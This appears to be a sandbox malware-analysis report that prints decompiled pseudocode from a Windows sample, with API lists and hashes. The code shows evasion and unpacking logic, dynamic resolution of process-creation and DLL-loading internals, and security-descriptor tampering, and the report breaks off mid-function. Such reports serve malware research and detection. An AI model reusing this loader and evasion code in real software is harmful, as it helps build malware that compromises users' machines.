    • Source File: 00000001.00000002.196926157.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.196922569.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000001.00000002.196944770.0000000000427000.00000002.00020000.sdmp
    • Associated: 00000001.00000002.196948050.0000000000428000.00000004.00020000.sdmp
    Similarity
    • API ID: AllocateMemoryVirtual
    • String ID:
    • API String ID: 2167126740-0
    • Opcode ID: 76538b6c075140c6cdd3edadd7b181ea52f6a16d1a8d24a34b10e5025c22849e
    • Instruction ID: fa7fdad05dd5aacf96cb1dbd0332fc11f6bee89d6edaba40021a428d7adb533e
    • Opcode Fuzzy Hash: 76538b6c075140c6cdd3edadd7b181ea52f6a16d1a8d24a34b10e5025c22849e
    • Instruction Fuzzy Hash: 93D023711100006FCB1DC700CC6DF617F68A744300F04408DB3064B0F1DA70B505CF14
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 70%
    			E0040135D(void* __edx, void* __eflags) {
    				long _v8;
    				char _v12;
    				char _v16;
    				char _v20;
    				char _v96;
    				char _v608;
    				void* __ebx;
    				void* __esi;
    				intOrPtr _t16;
    				intOrPtr _t19;
    				intOrPtr _t22;
    				void* _t24;
    				intOrPtr _t27;
    				void* _t30;
    				void* _t31;
    				char* _t37;
    				char* _t42;
    				void* _t48;
    				struct HWND__* _t55;
    				struct HWND__* _t57;
    				void* _t64;
    				void* _t68;
    				WCHAR* _t72;
    				struct HWND__* _t73;
    				intOrPtr* _t74;
    
    				_t68 = __edx;
    				_t16 =  *0x428284; // 0x401748
    				_t1 = _t16 + 1; // 0x24c91
    				_t60 = "asdxgbn";
    				_v8 = 0;
    				 *0x4282a8 =  *_t1; // executed
    				E0040101D("asdxgbn");
    				_t19 =  *0x428284; // 0x401748
    				_t3 = _t19 + 5; // 0x1b71b
    				 *0x42a520 =  *_t3; // executed
    				E0040101D("asdxgbn");
    				_t22 =  *0x428284; // 0x401748
    				_t4 = _t22 + 9; // 0x22a00
    				 *0x42a51c =  *_t4; // executed
    				_t24 = E00401032("RegisterClassExA"); // executed
    				 *0x42828c = E004011B6(3, _t60, _t68, _t24);
    				_t27 =  *0x428284; // 0x401748
    				_t5 = _t27 + 9; // 0x22a00
    				 *0x42a520 =  *_t5; // executed
    				E0040101D("utanwvwedwitpi%X"); // executed
    				_t64 = 0xae044e5e; // executed
    				_t30 = E00401326(_t64); // executed
    				if(_t30 == 0) {
    					L6:
    					_t31 = E0040127D();
    					_t72 = L"hrerfdyfhhenxpdyhxbihq";
    					if(_t31 != 0) {
    						mciSendStringW(_t72, 0, 0, 0); // from here to L15: calls into winmm, wintrust, imagehlp and powrprof whose results only gate further message boxes; they pad the import table and the observed behaviour profile
    						mciSendStringW(L"qyphlupgwgxraa", 0, 0, 0);
    					} else {
    						MessageBoxW(GetActiveWindow(), _t72, L"vltqggw", 0x30);
    					}
    					_v12 = 0;
    					__imp__WintrustGetRegPolicyFlags( &_v16);
    					__imp__ImageEnumerateCertificates( *0x42a514, 0xff,  &_v12,  &_v608, 0x80);
    					_t37 =  &_v20;
    					__imp__GetActivePwrScheme(_t37);
    					if(_t37 != 0) {
    						_t42 =  &_v96;
    						__imp__GetPwrCapabilities(_t42);
    						if(_t42 != 0) {
    							__imp__IsPwrHibernateAllowed();
    							if(_t42 == 0) {
    								__imp__IsPwrShutdownAllowed();
    								if(_t42 != 0) {
    									MessageBoxA(0, "mffdomjatpjdwpjj", "elqylo", 0x10);
    								}
    							} else {
    								MessageBoxW(0, _t72, L"vltqggw", 0x30);
    							}
    						}
    					}
    					L15:
    					E0040101D(_t60);
    					ShowWindow(_v8, 0); // SW_HIDE: the window created below stays invisible
    					UpdateWindow(_v8);
    					return _v8;
    				}
    				_push(0xae044e5e);
    				E0040101D("utanwvwedwitpi%X"); // executed
    				_t48 = E004012DE(); // executed
    				 *0x428280 = _t48 + 0xae044e5e;
    				if(E00426D37() +  *0x428280 == 0) {
    					goto L6;
    				}
    				E0040101D(_t60); // executed
    				 *_t74 = 0x4294bc;
    				if(RegisterClassExA(??) != 0) {
    					E0040101D(_t60); // executed
    					 *_t74 = "mvyekutimwkpvmfvnm";
    					_t55 = FindWindowA(0, ??); // executed
    					_t73 = _t55;
    					if(_t73 != 0) {
    						SetWindowPos(_t73, 0, 0, 0, 0, 0, 3);
    						SetFocus(_t73);
    					}
    					_t57 = CreateWindowExA(0, 0x4294f0, "rwqnvgmlfijtgw", 0xcf0000, 0x80000000, 0, 0x80000000, 0, 0, 0,  *0x42a514, 0); // executed
    					_v8 = _t57;
    					if(_t57 != 0) {
    						goto L15;
    					}
    				}
    			}

    Instruction address column for the listing above (one address per decompiled line, flattened by extraction): 0x0040135d to 0x0040156b

    APIs
      • Part of subcall function 0040101D: OutputDebugStringA.KERNELBASE(?), ref: 00401027
      • Part of subcall function 00401032: lstrlenA.KERNEL32(RegisterClassExA,?,00000080,00000000,asdxgbn), ref: 00401052
      • Part of subcall function 004011B6: LoadLibraryA.KERNEL32(CRYPT32,?,004013BA,00000000,00000000), ref: 004011D0
      • Part of subcall function 004011B6: GetProcAddress.KERNEL32(?,?), ref: 0040122A
      • Part of subcall function 00401326: NtAllocateVirtualMemory.NTDLL(000000FF,004282A0,00000000,?,00001000,00000004,AE044E5E,?,004013E3,00000000,00000000), ref: 00401350
    • RegisterClassExA.USER32(asdxgbn), ref: 0040141E
    • FindWindowA.USER32 ref: 00401437
    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000003), ref: 0040144B
    • SetFocus.USER32(00000000), ref: 00401452
    • CreateWindowExA.USER32 ref: 0040147A
    • GetActiveWindow.USER32 ref: 004014A1
    • MessageBoxW.USER32(00000000), ref: 004014A8
    • mciSendStringW.WINMM(hrerfdyfhhenxpdyhxbihq,00000000,00000000,00000000), ref: 004014B4
    • mciSendStringW.WINMM(qyphlupgwgxraa,00000000,00000000,00000000), ref: 004014C2
    • WintrustGetRegPolicyFlags.WINTRUST(?), ref: 004014CF
    • ImageEnumerateCertificates.IMAGEHLP(000000FF,00401596,?,00000080), ref: 004014F0
    • GetActivePwrScheme.POWRPROF(?), ref: 004014FA
    • GetPwrCapabilities.POWRPROF(?), ref: 00401508
    • IsPwrHibernateAllowed.POWRPROF ref: 00401512
    • MessageBoxW.USER32(00000000,hrerfdyfhhenxpdyhxbihq,vltqggw,00000030), ref: 00401525
    • IsPwrShutdownAllowed.POWRPROF ref: 0040152D
    • MessageBoxA.USER32 ref: 00401544
    • ShowWindow.USER32(?,00000000), ref: 00401555
    • UpdateWindow.USER32(?), ref: 0040155E
      • Part of subcall function 00426D37: lstrcpyA.KERNEL32(rwqnvgmlfijtgw,rwqnvgmlfijtgw,00000000,AE044E5E,asdxgbn,00401409,00000000,00000000), ref: 00426D50
      • Part of subcall function 00426D37: lstrcpyA.KERNEL32(004294F0,nkpbavksay), ref: 00426D5D
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.196926157.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.196922569.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000001.00000002.196944770.0000000000427000.00000002.00020000.sdmp
    • Associated: 00000001.00000002.196948050.0000000000428000.00000004.00020000.sdmp
    Similarity
    • API ID: Window$MessageString$ActiveAllowedSendlstrcpy$AddressAllocateCapabilitiesCertificatesClassCreateDebugEnumerateFindFlagsFocusHibernateImageLibraryLoadMemoryOutputPolicyProcRegisterSchemeShowShutdownUpdateVirtualWintrustlstrlen
    • String ID: RegisterClassExA$asdxgbn$elqylo$hrerfdyfhhenxpdyhxbihq$mffdomjatpjdwpjj$qyphlupgwgxraa$rwqnvgmlfijtgw$utanwvwedwitpi%X$vltqggw
    • API String ID: 2637225914-4101549737
    • Opcode ID: d1a68afb3dc7677a7c77daf30ca3f62313878091e96745542a65db1886a29248
    • Instruction ID: b1cf619c449f384919144929dc10ea7b866c25cb33b5f8cc5e7dbd1e24f3fd02
    • Opcode Fuzzy Hash: d1a68afb3dc7677a7c77daf30ca3f62313878091e96745542a65db1886a29248
    • Instruction Fuzzy Hash: 01516071745254FBD720AFA1AC4DE6F3BB8EF85704B90407AF501A72A1DB3859068B3D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 92%
    			_entry_(void* __ebx, void* __edx, void* __edi) {
    				struct tagMSG _v32;
    				struct HINSTANCE__* _t4;
    				intOrPtr _t5;
    				void* _t6;
    				void* _t17;
    				void* _t18;
    
    				_t18 = __edi;
    				_t17 = __edx;
    				_t4 = LoadLibraryA("skembuptpwnoq"); // executed -- deliberately non-existent DLL name (the "Tries to load missing DLLs" signature); the failure path is the real initialisation
    				if(_t4 == 0) {
    					E004015DA(__ebx, __edi);
    				}
    				_push(_t18);
    				_t25 =  *0x4294ec;
    				if( *0x4294ec != 0) {
    					_t6 = E0040135D(_t17, _t25); // executed
    					if(_t6 != 0) {
    						E0040101D("asdxgbn");
    						while(GetMessageW( &_v32, 0, 0, 0) != 0) { // message loop for the hidden window created in E0040135D
    							TranslateMessage( &_v32);
    							DispatchMessageW( &_v32);
    						}
    					}
    				}
    				_t5 =  *0x428278; // 0xf808ba61
    				return _t5;
    			}

    Instruction address column for the listing above (one address per decompiled line, flattened by extraction): 0x0040156c to 0x004015d7

    APIs
    • LoadLibraryA.KERNELBASE(skembuptpwnoq), ref: 00401577
    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004015C9
      • Part of subcall function 004015DA: HeapCreate.KERNELBASE(00000000,0016FCD8,00000000,00401586), ref: 004015EE
      • Part of subcall function 004015DA: GetProcessHeap.KERNEL32 ref: 004015FD
    • TranslateMessage.USER32(?), ref: 004015B2
    • DispatchMessageW.USER32 ref: 004015BC
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.196926157.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.196922569.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000001.00000002.196944770.0000000000427000.00000002.00020000.sdmp
    • Associated: 00000001.00000002.196948050.0000000000428000.00000004.00020000.sdmp
    Similarity
    • API ID: Message$Heap$CreateDispatchLibraryLoadProcessTranslate
    • String ID: asdxgbn$skembuptpwnoq
    • API String ID: 2737112283-786223230
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 77%
    			E00401032(CHAR* __esi) {
    				CHAR* _v8;
    				char _v136;
    				intOrPtr _t19;
    				signed char _t27;
    				void* _t30;
    				signed int _t32;
    				void* _t34;
    				void* _t37;
    				signed int _t38;
    				signed int _t39;
    				signed int _t43;
    				signed int _t44;
    				signed int _t45;
    				signed int _t46;
    				signed int _t47;
    				void* _t48;
    				void* _t49;
    				CHAR* _t50;
    				void* _t51;
    				void* _t52;
    				void* _t53;
    				signed int _t59;
    				CHAR* _t60;
    				CHAR* _t61;
    				void* _t64;
    				void* _t69;
    				void* _t70;
    
    				_t50 = __esi;
    				_t32 =  *__esi;
    				_t48 = 0x80;
    				E00401000( &_v136, 0x80);
    				lstrlenA(__esi);
    				_v8 = __esi;
    				_t34 = 0;
    				_v8 = _v8 -  &_v136;
    				while(1) {
    					_t19 = _v8;
    					_t43 = _t51 + _t34 - 0x84;
    					if( *((char*)(_t19 + _t43)) == 0) {
    						break;
    					}
    					_t37 = _t34;
    					if(_t37 == 0) {
    						_t32 = _t32;
    					}
    					_t44 = _t43;
    					_t59 = _t44;
    					if (_t59 != 0) goto L5;
    					_push(_t32);
    					if(_t59 <= 0) {
    						_t50 = _t50;
    						_t60 = _t50;
    					}
    					_pop(_t33);
    					_t45 = _t44 >> 0xc0;
    					if(_t60 == 0) {
    						_t50 = _t50 ^ 0x00000000;
    						_t61 = _t50;
    					}
    					_pop(_t32);
    					_push(_t19);
    					if(_t61 == 0) {
    						_t37 = _t37;
    						_t45 = _t45;
    					}
    					asm("ror ecx, 0x0");
    					_t50 = _t50 & 0xffffffff;
    					_t52 = _t51;
    					_t49 = _t48;
    					_t46 = _t45;
    					_t51 = _t52;
    					_t48 = _t49;
    					_t64 = _t48;
    					asm("clc");
    					if(_t64 == 0 && _t64 == 0) {
    					}
    					_t47 = _t46;
    					_t53 = _t53 + 1 - 1;
    					_push(_t37);
    					if(_t37 < 0) {
    					}
    					_pop(_t38);
    					_t27 = ( &(_t50[4]))[_t38];
    					if(_t27 == 0) {
    						 *_t50 = 0;
    					} else {
    						_t30 = (_t27 ^ _t32) - _t38 - 1;
    						 *_t47 = _t30;
    						_t69 = _t30;
    						if(_t69 < 0) {
    							_t38 = _t38 >> 0xa0;
    						}
    						if(_t69 >= 0) {
    							_t70 = _t47 - 0x2001cde9;
    						}
    						asm("std");
    						asm("cld");
    						_t39 = _t38 >> 0x80;
    						if(_t70 < 0) {
    							_t32 = _t32 & 0xffffffff;
    						}
    						asm("stc");
    						asm("stc");
    						_t34 = _t39 - 1 + 2;
    						if(_t34 < _t48) {
    							continue;
    						} else {
    						}
    					}
    					break;
    				}
    				_push(0xcba703a7);
    				E0040101D("utanwvwedwitpi%X"); // executed
    				lstrcpyA(_t50,  &_v136);
    				return _t50;
    			}

    APIs
    • lstrlenA.KERNEL32(RegisterClassExA,?,00000080,00000000,asdxgbn), ref: 00401052
    • lstrcpyA.KERNEL32(RegisterClassExA,?), ref: 00401139
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.196926157.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.196922569.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000001.00000002.196944770.0000000000427000.00000002.00020000.sdmp
    • Associated: 00000001.00000002.196948050.0000000000428000.00000004.00020000.sdmp
    Similarity
    • API ID: lstrcpylstrlen
    • String ID: RegisterClassExA$asdxgbn$utanwvwedwitpi%X
    • API String ID: 2001356338-2097055956
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 75%
    			E004268FF(void** __esi) {
    				long _v8;
    				long _t11;
    
    				_v8 = _v8 & 0x00000000;
    				_push(0x393f5a76);
    				_t22 = "utanwvwedwitpi%X";
    				E0040101D("utanwvwedwitpi%X"); // executed
    				if(RtlDecompressBuffer(2, __esi[1], __esi[3],  *__esi, __esi[2],  &_v8) >= 0) {
    					_t11 = _v8;
    				} else {
    					_push(0x393f5a76);
    					E0040101D(_t22);
    					_t11 = 0;
    				}
    				return _t11;
    			}

    APIs
      • Part of subcall function 0040101D: OutputDebugStringA.KERNELBASE(?), ref: 00401027
    • RtlDecompressBuffer.NTDLL(00000002,?,?,?,?,00000000), ref: 0042692D
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.196926157.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.196922569.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000001.00000002.196944770.0000000000427000.00000002.00020000.sdmp
    • Associated: 00000001.00000002.196948050.0000000000428000.00000004.00020000.sdmp
    Similarity
    • API ID: BufferDebugDecompressOutputString
    • String ID: utanwvwedwitpi%X$vZ?9
    • API String ID: 1930138125-1856428638
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040101D(intOrPtr _a4) {
    				char _v104;
    
    				OutputDebugStringA( &_v104); // executed
    				return _a4;
    			}

    APIs
    • OutputDebugStringA.KERNELBASE(?), ref: 00401027
    Memory Dump Source
    • Source File: 00000001.00000002.196926157.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.196922569.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000001.00000002.196944770.0000000000427000.00000002.00020000.sdmp
    • Associated: 00000001.00000002.196948050.0000000000428000.00000004.00020000.sdmp
    Similarity
    • API ID: DebugOutputString
    • String ID:
    • API String ID: 1166629820-0
    Uniqueness

    Uniqueness Score: -1.00%

    Non-executed Functions

    C-Code - Quality: 80%
    			E004011B6(signed int __eax, void* __ebx, void* __edx, CHAR* _a4) {
    				signed int _t5;
    				struct HINSTANCE__* _t6;
    				struct HINSTANCE__* _t7;
    				void* _t9;
    				void* _t11;
    				void* _t14;
    				void* _t33;
    				struct HINSTANCE__* _t34;
    
    				_t5 = __eax & 0x000000ff;
    				if(_t5 == 0) {
    					_t6 =  *0x42a510;
    				} else {
    					_t9 = _t5 - 1;
    					if(_t9 == 0) {
    						_t6 =  *0x42a518;
    					} else {
    						_t11 = _t9;
    						if(_t11 == 0) {
    							_t6 = GetModuleHandleA("user32");
    						} else {
    							_t33 = _t11 - 1;
    							if(_t33 != 0) {
    								_t6 = _a4;
    							} else {
    								_t6 = LoadLibraryA("CRYPT32");
    							}
    						}
    					}
    				}
    				if(_t33 < 0) {
    					_t14 = _t14;
    				}
    				_t7 = _t6;
    				_t34 = _t7;
    				if(_t34 < 0) {
    					_push(_t20);
    				}
    				if(_t34 < 0) {
    					_push(0xffffffc8);
    				}
    				asm("clc");
    				_push(_t14);
    				if(_t34 <= 0) {
    					_t7 = _t7 & 0xffffffff;
    				}
    				return GetProcAddress(_t7, _a4);
    			}

    APIs
    • LoadLibraryA.KERNEL32(CRYPT32,?,004013BA,00000000,00000000), ref: 004011D0
    • GetModuleHandleA.KERNEL32(user32,?,004013BA,00000000,00000000), ref: 004011DD
    • GetProcAddress.KERNEL32(?,?), ref: 0040122A
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.196926157.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.196922569.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000001.00000002.196944770.0000000000427000.00000002.00020000.sdmp
    • Associated: 00000001.00000002.196948050.0000000000428000.00000004.00020000.sdmp
    Similarity
    • API ID: AddressHandleLibraryLoadModuleProc
    • String ID: CRYPT32$RegisterClassExA$user32
    • API String ID: 310444273-2232810154
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00426D37() {
    
    				lstrcpyA("rwqnvgmlfijtgw", "rwqnvgmlfijtgw");
    				lstrcpyA(0x4294f0, "nkpbavksay");
    				E00401000(0x4294bc, 0x30);
    				 *0x4294e4 = 0x4294f0;
    				 *0x4294c8 = 0;
    				 *0x4294cc = 0;
    				 *0x4294d4 = 0;
    				 *0x4294d8 = 0;
    				 *0x4294d0 =  *0x42a514;
    				 *0x4294c4 = E0042664E;
    				 *0x4294e0 = "skembuptpwnoq";
    				 *0x4294c0 = 3;
    				 *0x4294dc = 8;
    				 *0x4294bc = 0x30;
    				return 0x4294bc;
    			}

    APIs
    • lstrcpyA.KERNEL32(rwqnvgmlfijtgw,rwqnvgmlfijtgw,00000000,AE044E5E,asdxgbn,00401409,00000000,00000000), ref: 00426D50
    • lstrcpyA.KERNEL32(004294F0,nkpbavksay), ref: 00426D5D
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.196926157.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.196922569.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000001.00000002.196944770.0000000000427000.00000002.00020000.sdmp
    • Associated: 00000001.00000002.196948050.0000000000428000.00000004.00020000.sdmp
    Similarity
    • API ID: lstrcpy
    • String ID: asdxgbn$nkpbavksay$rwqnvgmlfijtgw$rwqnvgmlfijtgw$skembuptpwnoq
    • API String ID: 3722407311-1356767260
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • LocalAlloc.KERNEL32(00000040,00000100,?,?,?,?,?,?,00401490,00000000,00000000), ref: 0040128A
    • ClusterEnum.CLUSAPI(00000000,00000000,00000000,?,?), ref: 004012C1
    • CertCreateCertificateChainEngine.CRYPT32(00000028,?), ref: 004012D3
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.196926157.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.196922569.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000001.00000002.196944770.0000000000427000.00000002.00020000.sdmp
    • Associated: 00000001.00000002.196948050.0000000000428000.00000004.00020000.sdmp
    Similarity
    • API ID: AllocCertCertificateChainClusterCreateEngineEnumLocal
    • String ID: (
    • API String ID: 3861096817-3887548279
    Uniqueness

    Uniqueness Score: -1.00%

    Executed Functions

    C-Code - Quality: 79%
    			E00419997(struct _SECURITY_DESCRIPTOR* __edi, intOrPtr* __esi) {
    				signed int _v8;
    				struct _ACL* _v12;
    				int _v16;
    				int _v20;
    				void** _t19;
    				struct _SECURITY_DESCRIPTOR* _t28;
    				intOrPtr* _t29;
    
    				_t29 = __esi;
    				_t28 = __edi;
    				if(InitializeSecurityDescriptor(__edi, 1) == 0 || SetSecurityDescriptorDacl(__edi, 1, 0, 0) == 0) {
    					return 0;
    				} else {
    					_t19 =  &_v8;
    					__imp__ConvertStringSecurityDescriptorToSecurityDescriptorW(L"S:(ML;;NRNWNX;;;LW)", 1, _t19, 0); // executed
    					if(_t19 == 0) {
    						L6:
    						_v8 = _v8 | 0xffffffff;
    						L7:
    						if(_t29 != 0) {
    							 *_t29 = 0xc;
    							 *(_t29 + 4) = _t28;
    							 *((intOrPtr*)(_t29 + 8)) = 0;
    						}
    						return _v8;
    					}
    					_v12 = 0;
    					if(GetSecurityDescriptorSacl(_v8,  &_v20,  &_v12,  &_v16) == 0 || SetSecurityDescriptorSacl(__edi, _v20, _v12, _v16) == 0) {
    						LocalFree(_v8);
    						goto L6;
    					} else {
    						goto L7;
    					}
    				}
    			}

    APIs
    • InitializeSecurityDescriptor.ADVAPI32(00422BDC,00000001,00000000,0040EBA4,?,?,00000000), ref: 004199A1
    • SetSecurityDescriptorDacl.ADVAPI32(00422BDC,00000001,00000000,00000000,?,?,00000000), ref: 004199B2
    • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 004199C8
    • GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,?,?,?,00000000), ref: 004199E4
    • SetSecurityDescriptorSacl.ADVAPI32(00422BDC,?,?,?,?,?,00000000), ref: 004199F8
    • LocalFree.KERNEL32(00000000,?,?,00000000), ref: 00419A05
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: DescriptorSecurity$Sacl$ConvertDaclFreeInitializeLocalString
    • String ID: S:(ML;;NRNWNX;;;LW)
    • API String ID: 2050860296-820036962
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 87%
    			E0040E97B(signed int** __ecx, void* __edx, signed char _a4) {
    				char _v435;
    				char _v796;
    				char _v804;
    				char _v816;
    				intOrPtr _v824;
    				intOrPtr _v828;
    				signed int _v832;
    				intOrPtr _v836;
    				signed int** _v840;
    				struct HINSTANCE__* _v844;
    				void* __edi;
    				void* __esi;
    				signed int _t40;
    				struct HINSTANCE__* _t43;
    				struct HINSTANCE__* _t47;
    				_Unknown_base(*)()* _t53;
    				void* _t54;
    				signed int _t57;
    				void** _t58;
    				void** _t60;
    				signed int _t62;
    				signed int _t64;
    				signed int _t65;
    				signed int _t67;
    				void* _t73;
    				intOrPtr _t77;
    				signed int _t78;
    				signed int _t79;
    				signed int _t80;
    				struct HINSTANCE__* _t81;
    				int _t83;
    				signed int _t86;
    				void* _t89;
    				signed int* _t91;
    				signed int _t95;
    				WCHAR* _t97;
    				void* _t98;
    				signed int* _t100;
    				void* _t109;
    				void* _t110;
    				void* _t111;
    				void* _t112;
    
    				_t89 = __edx;
    				_t87 = __ecx;
    				_t95 = _a4 & 0x00000001;
    				_v832 = _t95;
    				if(_t95 != 0) {
    					_t83 = 0;
    					__eflags = 0;
    				} else {
    					_t83 = 0;
    					 *0x422b98 = 0;
    				}
    				_t91 = E0040E636();
    				 *0x422bb0 = _t91;
    				if(_t91 == _t83) {
    					L27:
    					_t40 = 0;
    				} else {
    					if(_t95 != _t83) {
    						_v832 = E0040E570(_t87, _t89, _t91, "GetProcAddress");
    						_v832 = E0040E570(_t87, _t89, _t91, "LoadLibraryA");
    						_t43 =  *0x422bac; // 0x400000
    						_t5 = _t43 + 0x3c; // 0xd8
    						_v844 = _t43;
    						_t87 =  *_t5 + _t43 + 0x80;
    						__eflags = _v832 - _t83;
    						if(_v832 == _t83) {
    							goto L21;
    						} else {
    							__eflags = _v828 - _t83;
    							if(_v828 == _t83) {
    								goto L21;
    							} else {
    								_t91 =  *_t87;
    								__eflags = _t91 - _t83;
    								if(_t91 <= _t83) {
    									goto L21;
    								} else {
    									__eflags = _t87[1] - 0x14;
    									if(_t87[1] <= 0x14) {
    										goto L21;
    									} else {
    										_t91 = _t91 + _t43;
    										__eflags =  *_t91 - _t83;
    										if( *_t91 == _t83) {
    											goto L21;
    										} else {
    											while(1) {
    												_t77 = _v824(_t91[3] + _v836);
    												_v824 = _t77;
    												__eflags = _t77 - _t83;
    												if(_t77 == _t83) {
    													goto L27;
    												}
    												_t100 = _v840 +  *_t91;
    												_t86 = _v840 + _t91[4];
    												while(1) {
    													_t78 =  *_t100;
    													__eflags = _t78;
    													if(__eflags == 0) {
    														break;
    													}
    													if(__eflags >= 0) {
    														_t87 = _v840;
    														_t79 =  &(_v840[0]) + _t78;
    													} else {
    														_t79 = _t78 & 0x0000ffff;
    													}
    													_t80 = _v832(_v824, _t79);
    													__eflags = _t80;
    													if(_t80 == 0) {
    														goto L27;
    													} else {
    														 *_t86 = _t80;
    														_t100 =  &(_t100[1]);
    														_t86 = _t86 + 4;
    														__eflags = _t86;
    														continue;
    													}
    													goto L47;
    												}
    												_t91 =  &(_t91[5]);
    												_t83 = 0;
    												__eflags =  *_t91;
    												if( *_t91 != 0) {
    													continue;
    												} else {
    													goto L21;
    												}
    												goto L47;
    											}
    											goto L27;
    										}
    									}
    								}
    							}
    						}
    					} else {
    						_t81 = GetModuleHandleW(_t83);
    						 *0x422bac = _t81;
    						if(_t81 == _t83) {
    							goto L27;
    						} else {
    							L21:
    							_t97 =  &_v816;
    							E0040FA33(0xe5, _t97);
    							_t47 = GetModuleHandleW(_t97);
    							 *0x422bb4 = _t47;
    							if(_t47 == _t83) {
    								goto L27;
    							} else {
    								_t98 = GetProcAddress;
    								 *0x422bb8 = GetProcAddress(_t47, "NtCreateThread");
    								 *0x422bbc = GetProcAddress( *0x422bb4, "NtCreateUserProcess");
    								 *0x422bc0 = GetProcAddress( *0x422bb4, "NtQueryInformationProcess");
    								 *0x422bc4 = GetProcAddress( *0x422bb4, "RtlUserThreadStart");
    								 *0x422bc8 = GetProcAddress( *0x422bb4, "LdrLoadDll");
    								_t53 = GetProcAddress( *0x422bb4, "LdrGetDllHandle");
    								 *0x422bcc = _t53;
    								_t109 =  *0x422bb8 - _t83; // 0x77e599e0
    								if(_t109 != 0) {
    									L24:
    									_t111 =  *0x422bc0 - _t83; // 0x77e59670
    									if(_t111 == 0) {
    										goto L27;
    									} else {
    										_t112 =  *0x422bc8 - _t83; // 0x77e27840
    										if(_t112 == 0 || _t53 == _t83) {
    											goto L27;
    										} else {
    											_t54 = HeapCreate(_t83, 0x80000, _t83); // executed
    											 *0x424010 = _t54;
    											__eflags = _t54 - _t83;
    											if(_t54 != _t83) {
    												 *0x422833 = 1;
    											} else {
    												 *0x424010 = GetProcessHeap();
    												 *0x422833 = 0;
    											}
    											 *0x423244 = _t83;
    											 *0x422832 = 0;
    											InitializeCriticalSection(0x4231ac);
    											 *0x423144 = _t83; // executed
    											__imp__#115(0x202,  &_v796); // executed
    											_t57 = E0040E670(_a4, _t87, _t91, _t98);
    											__eflags = _t57;
    											if(_t57 == 0) {
    												goto L27;
    											} else {
    												__eflags = _v840 - _t83;
    												if(_v840 != _t83) {
    													L34:
    													_t58 = E004179BF(_t87, 0xffffffff, 0x422ba8);
    													 *0x422b9c = _t58;
    													__eflags = _t58 - _t83;
    													if(_t58 == _t83) {
    														goto L27;
    													} else {
    														 *0x422ba0 = GetLengthSid( *_t58);
    														_t60 =  *0x422b9c; // 0x0
    														 *0x422ba4 = E00417757( *_t60, _t59);
    														_t62 = E0040E6EF(_t61, _a4);
    														__eflags = _t62;
    														if(_t62 == 0) {
    															goto L27;
    														} else {
    															 *0x422e08 = GetCurrentProcessId();
    															 *0x422e0c = _t83;
    															__eflags = _v840 - _t83;
    															if(_v840 != _t83) {
    																_t64 = 1;
    															} else {
    																_t64 = E0040E751();
    															}
    															__eflags = _t64;
    															if(_t64 == 0) {
    																goto L27;
    															} else {
    																__eflags = _v840 - _t83;
    																if(_v840 == _t83) {
    																	E0040F05A( &_v804);
    																	_t87 = 0x423006;
    																	E0041AA01(0x423006, 0x422e10,  *0x422ba4,  &_v435, _t83);
    																}
    																_t65 = E0040E7A3(_a4);
    																__eflags = _t65;
    																if(_t65 == 0) {
    																	goto L27;
    																} else {
    																	__eflags = _a4 & 0x00000002;
    																	 *0x424020 = _t83;
    																	 *0x4223a8 = 0;
    																	 *0x4231d8 = 0;
    																	 *0x422838 = 0;
    																	 *0x4227d0 = 0;
    																	 *0x423148 = 0;
    																	 *0x4230c0 = 0;
    																	if(__eflags == 0) {
    																		_t67 = 1;
    																	} else {
    																		_t67 = E0040E85A(_t87, _t89, __eflags);
    																	}
    																	__eflags = _t67;
    																	_t38 = _t67 != 0;
    																	__eflags = _t38;
    																	_t40 = _t67 & 0xffffff00 | _t38;
    																}
    															}
    														}
    													}
    												} else {
    													_t73 = CreateEventW(0x422bd0, 1, _t83, _t83);
